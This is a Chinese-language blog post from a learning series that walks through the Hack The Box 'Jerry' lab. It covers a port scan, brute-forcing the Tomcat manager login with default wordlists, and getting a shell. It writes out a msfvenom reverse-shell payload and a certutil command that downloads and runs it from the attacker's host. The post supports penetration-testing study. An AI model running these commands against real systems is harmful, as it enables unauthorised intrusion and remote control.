iT邦幫忙

2021 iThome 鐵人賽

DAY 26
0
Security

我想學滲透測試喵喵喵喵!!!!系列 第 26

[Day26] HTB Jerry

Scan

  • 掃 Port
    • rustscan -a 10.129.1.110 -r 1-65535
    • 發現有開8080

Brute Force

  • 嘗試 msf 爆破
    • auxiliary/scanner/http/tomcat_mgr_login
    • 發現密碼是 tomcat:s3cret
  • Wordlist
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_pass.txt
    • /usr/share/metasploit-framework/data/wordlists/tomcat_mgr_default_users.txt

進入 Manager APP

  • 發現不登入直接按 Manager App 就可以進後台ㄌ= =

Web shell

Reverse shell

  • 準備 Reverse shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe > shell.exe
  • 下載 reverse shell
    • certutil -urlcache -f http://10.10.16.35/shell.exe shell8787.exe
  • 執行 Reverse shell
  • 取得 Flag

上一篇
[Day25] HTB Granny
下一篇
[Day27] HTB Legacy
系列文
我想學滲透測試喵喵喵喵!!!!30

尚未有邦友留言

立即登入留言